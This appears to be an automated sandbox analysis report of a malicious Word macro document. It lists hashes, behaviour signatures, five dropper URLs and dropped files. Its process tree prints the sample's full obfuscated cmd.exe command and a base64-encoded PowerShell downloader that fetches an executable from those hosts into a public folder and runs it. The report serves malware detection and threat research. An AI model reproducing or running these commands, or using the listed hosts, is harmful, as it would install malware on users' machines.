Analysis

  • max time kernel
    133s
  • max time network
    130s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240508-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
  • submitted
    31-05-2024 17:47

General

  • Target

    87cf239da2f6be707863119899a51869_JaffaCakes118.doc

  • Size

    88KB

  • MD5

    87cf239da2f6be707863119899a51869

  • SHA1

    82ff49eea53759f63a03b90a73a152fd8c207bde

  • SHA256

    63e1718a3b4d658a1672e24c081e36dd42bcaa74f03db39621afb7470822a28d

  • SHA512

    e18cbdec3730e10cc0899853ba9369dc86d556559a037fe7c61234679a009da8c2d5c8621bd34f0a06e1d042b48719727529e1653a08d2e5ad49102aca12d8d6

  • SSDEEP

    768:zpJcaUitGAlmrJpmxlzC+w99NB++1ouFqKKLHSsm8eeOuGyUy/PjbfydIW0K+U:zptJlmrJpmxlRw99NB++auk0kHDvuW

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://yurystvpolshi.pl/12127D

exe.dropper

http://finansvekredi.com/E

exe.dropper

http://www.she-wolf.eu/vs4WT

exe.dropper

http://sunflowerschoolandcollege.com/wordpress/FQ8NEHLV

exe.dropper

http://bucakservisciler.com/dQcPfG

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 2 IoCs
  • An obfuscated cmd.exe command-line is typically used to evade detection. 1 IoCs
  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 7 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\87cf239da2f6be707863119899a51869_JaffaCakes118.doc" /o ""
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:4804
    • C:\Windows\SYSTEM32\Cmd.exe
      Cmd /V^:^O/C"^s^e^t n^1^fV=^=^=A^A^gAAIA^AC^Ag^A^A^IA^AC^A^g^AA^I^A^ACA^gAA^IA^ACA^gA^A^I^AACAg^A^AIA^0^H^A^9Bw^eA^gG^AjBA^dA^EG^AjBQf^A^s^D^Ar^BQ^Y^A^U^G^A^y^Bg^YA^s^DAJB^g^b^AoG^A^kAA^I^A0GAl^B^A^d^A^kE^A^t^AQ^ZAsG^AvBg^dA^4GAJ^Bw^O^AkCA^JB^gbA^oG^A^k^A^A^I^A^wC^A^1B^w^Y^A^UE^Ak^A^A^KAU^G^As^BQ^a^AY^E^Ak^BQYA8GA^s^B^g^bAcH^AvBARA^4C^AEBwdAYF^A^kA^w^eAkHAy^B^A^dAsHA^p^AgRA^w^EAE^BA^JA^AC^A^u^B^Q^aA^ACA^1^Bw^Y^A^U^EA^k^A^A^K^AgG^A^j^BQ^YA^U^G^AyBw^bAYG^A^7A^w^JA^U^G^A4B^Q^ZA^4C^AnA^wK^A8^E^A0B^g^bA^QC^Ar^A^w^JA^wF^AnAwK^AMGA^p^B^A^b^AI^G^A^1^BAcAo^D^A2BgbAUGA^kA^Q^P^Ak^EAuBg^a^AQCA7A^wJ^A^gDAyA^Q^MAcCA^gAQ^PAACA^PBA^dA4^GAkA^wO^AkC^AnAAQ^AcCAoAAdA^kG^As^BAc^AM^FA^uAw^JAc^E^Am^BA^U^A^MG^ARB^AZ^A8C^AtB^wb^A^MG^A^uA^gcA^U^G^A^sBQ^aA^MG^Az^B^QaAYHA^y^BQZAMHArB^Q^YA^M^GA1B^g^Y^A^8CAv^A^g^O^AA^HA0B^Ad^Ag^GA^A^BgV^Aw^E^AI^BQRA^4E^A4A^QUA^Y^E^AvAwc^AMH^Al^BgcAAHAkB^gcA^8^GA^3^B^w^LA^0^GAv^Bw^Y^A^4CAl^B^wZ^A^U^GAsB^A^b^A^8GAjBA^Z^A4^GA^h^BA^bA8^G^AvBA^a^AM^GAzB^gcA^UGA3B^w^bAw^G^Am^BgbAU^H^A^zB^w^LA^8CA^6^AAcAQHA^0^BAaA^A^EAUB^wVA^QDA^zB^gd^A8CA1B^QZ^A^4C^A^m^B^AbA8GA^3^B^QLA^U^GAoB^wc^A4C^A3B^wdAc^H^AvA^w^L^AoD^A^w^B^A^dAQ^HA^o^B^A^QAUE^AvA^Q^bA8^GA^j^B^g^L^AkGA^kB^QZAIH^ArB^QZAYH^A^z^B^g^bA^EGAu^B^Q^aAY^G^Av^A^wLAo^DA^w^B^Ad^A^Q^H^A^oBA^Q^AQEA3A^gMAE^DAyAQ^MA^8CA^s^B^Ac^A4CAp^BA^a^A^M^HAs^B^wb^A^A^H^A^2^B^A^dAM^HA5^B^gcAU^HA5^B^wLA^8CA^6^A^Ac^A^Q^HA^0BA^aAcCA9A^gR^A^w^E^AE^B^AJ^As^D^A0^B^g^bA^UG^A^pBA^bAMEAi^B^QZ^AcFA^uAAdAUGAO^BA^I^A^Q^HAj^B^Q^ZA^oG^AiB^w^b^A^0CA3^B^Q^ZA4GA9^A^AR^Ac^HAW^B^AJ ^e^- ^ll^eh^sr^e^w^op&&^f^or /^L %^9 ^in (1^021^;-^1^;0)^d^o ^s^et R^my=!R^my!!n^1^fV:~%^9,1!&&i^f %^9 e^q^u ^0 ca^l^l %R^my:~^-1^02^2%"
      2⤵
      • Process spawned unexpected child process
      • An obfuscated cmd.exe command-line is typically used to evade detection.
      • Suspicious use of WriteProcessMemory
      PID:516
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -e JABWAHcARAA9AG4AZQB3AC0AbwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJABEAEwARgA9ACcAaAB0AHQAcAA6AC8ALwB5AHUAcgB5AHMAdAB2AHAAbwBsAHMAaABpAC4AcABsAC8AMQAyADEAMgA3AEQAQABoAHQAdABwADoALwAvAGYAaQBuAGEAbgBzAHYAZQBrAHIAZQBkAGkALgBjAG8AbQAvAEUAQABoAHQAdABwADoALwAvAHcAdwB3AC4AcwBoAGUALQB3AG8AbABmAC4AZQB1AC8AdgBzADQAVwBUAEAAaAB0AHQAcAA6AC8ALwBzAHUAbgBmAGwAbwB3AGUAcgBzAGMAaABvAG8AbABhAG4AZABjAG8AbABsAGUAZwBlAC4AYwBvAG0ALwB3AG8AcgBkAHAAcgBlAHMAcwAvAEYAUQA4AE4ARQBIAEwAVgBAAGgAdAB0AHAAOgAvAC8AYgB1AGMAYQBrAHMAZQByAHYAaQBzAGMAaQBsAGUAcgAuAGMAbwBtAC8AZABRAGMAUABmAEcAJwAuAFMAcABsAGkAdAAoACcAQAAnACkAOwAkAG4AdABPACAAPQAgACcAMQAyADgAJwA7ACQAagBuAEkAPQAkAGUAbgB2ADoAcAB1AGIAbABpAGMAKwAnAFwAJwArACQAbgB0AE8AKwAnAC4AZQB4AGUAJwA7AGYAbwByAGUAYQBjAGgAKAAkAEUAYwB1ACAAaQBuACAAJABEAEwARgApAHsAdAByAHkAewAkAFYAdwBEAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAkAEUAYwB1ACwAIAAkAGoAbgBJACkAOwBJAG4AdgBvAGsAZQAtAEkAdABlAG0AIAAkAGoAbgBJADsAYgByAGUAYQBrADsAfQBjAGEAdABjAGgAewB9AH0AIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAA==
        3⤵
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:3468

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\TCD8622.tmp\gb.xsl

    Filesize

    262KB

    MD5

    51d32ee5bc7ab811041f799652d26e04

    SHA1

    412193006aa3ef19e0a57e16acf86b830993024a

    SHA256

    6230814bf5b2d554397580613e20681752240ab87fd354ececf188c1eabe0e97

    SHA512

    5fc5d889b0c8e5ef464b76f0c4c9e61bda59b2d1205ac9417cc74d6e9f989fb73d78b4eb3044a1a1e1f2c00ce1ca1bd6d4d07eeadc4108c7b124867711c31810

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_phzova4h.qfv.ps1

    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • C:\Users\Public\128.exe

    Filesize

    1KB

    MD5

    e3d53c3011f18b2391445d22e378c6ec

    SHA1

    03685364393a7f77aaddcc5fbe802266ce9f1e10

    SHA256

    28f63a65ca7602223eae0f26a8227d7b01a654973040fea5c2c43bd19928c51e

    SHA512

    b419fa4726cc1c51b10cd55889a1b82f0deedfb8d5fdf44f3277867f84aaec912ccfd8474ad811c9de24f68a2528d2c3a8281b5466f5c3c3078b1cefd788a533

  • memory/3468-50-0x000001A77C060000-0x000001A77C082000-memory.dmp

    Filesize

    136KB

  • memory/4804-8-0x00007FFE79CF0000-0x00007FFE79EE5000-memory.dmp

    Filesize

    2.0MB

  • memory/4804-21-0x00007FFE79CF0000-0x00007FFE79EE5000-memory.dmp

    Filesize

    2.0MB

  • memory/4804-6-0x00007FFE79CF0000-0x00007FFE79EE5000-memory.dmp

    Filesize

    2.0MB

  • memory/4804-7-0x00007FFE79CF0000-0x00007FFE79EE5000-memory.dmp

    Filesize

    2.0MB

  • memory/4804-9-0x00007FFE37C40000-0x00007FFE37C50000-memory.dmp

    Filesize

    64KB

  • memory/4804-2-0x00007FFE39D70000-0x00007FFE39D80000-memory.dmp

    Filesize

    64KB

  • memory/4804-10-0x00007FFE79CF0000-0x00007FFE79EE5000-memory.dmp

    Filesize

    2.0MB

  • memory/4804-13-0x00007FFE79CF0000-0x00007FFE79EE5000-memory.dmp

    Filesize

    2.0MB

  • memory/4804-12-0x00007FFE79CF0000-0x00007FFE79EE5000-memory.dmp

    Filesize

    2.0MB

  • memory/4804-11-0x00007FFE79CF0000-0x00007FFE79EE5000-memory.dmp

    Filesize

    2.0MB

  • memory/4804-15-0x00007FFE79CF0000-0x00007FFE79EE5000-memory.dmp

    Filesize

    2.0MB

  • memory/4804-17-0x00007FFE79CF0000-0x00007FFE79EE5000-memory.dmp

    Filesize

    2.0MB

  • memory/4804-18-0x00007FFE79CF0000-0x00007FFE79EE5000-memory.dmp

    Filesize

    2.0MB

  • memory/4804-20-0x00007FFE37C40000-0x00007FFE37C50000-memory.dmp

    Filesize

    64KB

  • memory/4804-19-0x00007FFE79CF0000-0x00007FFE79EE5000-memory.dmp

    Filesize

    2.0MB

  • memory/4804-16-0x00007FFE79CF0000-0x00007FFE79EE5000-memory.dmp

    Filesize

    2.0MB

  • memory/4804-14-0x00007FFE79CF0000-0x00007FFE79EE5000-memory.dmp

    Filesize

    2.0MB

  • memory/4804-5-0x00007FFE79D8D000-0x00007FFE79D8E000-memory.dmp

    Filesize

    4KB

  • memory/4804-22-0x00007FFE79CF0000-0x00007FFE79EE5000-memory.dmp

    Filesize

    2.0MB

  • memory/4804-36-0x00007FFE79CF0000-0x00007FFE79EE5000-memory.dmp

    Filesize

    2.0MB

  • memory/4804-37-0x00007FFE79CF0000-0x00007FFE79EE5000-memory.dmp

    Filesize

    2.0MB

  • memory/4804-38-0x00007FFE79CF0000-0x00007FFE79EE5000-memory.dmp

    Filesize

    2.0MB

  • memory/4804-3-0x00007FFE39D70000-0x00007FFE39D80000-memory.dmp

    Filesize

    64KB

  • memory/4804-0-0x00007FFE39D70000-0x00007FFE39D80000-memory.dmp

    Filesize

    64KB

  • memory/4804-4-0x00007FFE39D70000-0x00007FFE39D80000-memory.dmp

    Filesize

    64KB

  • memory/4804-1-0x00007FFE39D70000-0x00007FFE39D80000-memory.dmp

    Filesize

    64KB

  • memory/4804-538-0x00007FFE79CF0000-0x00007FFE79EE5000-memory.dmp

    Filesize

    2.0MB

  • memory/4804-548-0x00007FFE79CF0000-0x00007FFE79EE5000-memory.dmp

    Filesize

    2.0MB

  • memory/4804-549-0x00007FFE79CF0000-0x00007FFE79EE5000-memory.dmp

    Filesize

    2.0MB

  • memory/4804-550-0x00007FFE79CF0000-0x00007FFE79EE5000-memory.dmp

    Filesize

    2.0MB

  • memory/4804-573-0x00007FFE39D70000-0x00007FFE39D80000-memory.dmp

    Filesize

    64KB

  • memory/4804-572-0x00007FFE39D70000-0x00007FFE39D80000-memory.dmp

    Filesize

    64KB

  • memory/4804-571-0x00007FFE39D70000-0x00007FFE39D80000-memory.dmp

    Filesize

    64KB

  • memory/4804-570-0x00007FFE39D70000-0x00007FFE39D80000-memory.dmp

    Filesize

    64KB

  • memory/4804-574-0x00007FFE79CF0000-0x00007FFE79EE5000-memory.dmp

    Filesize

    2.0MB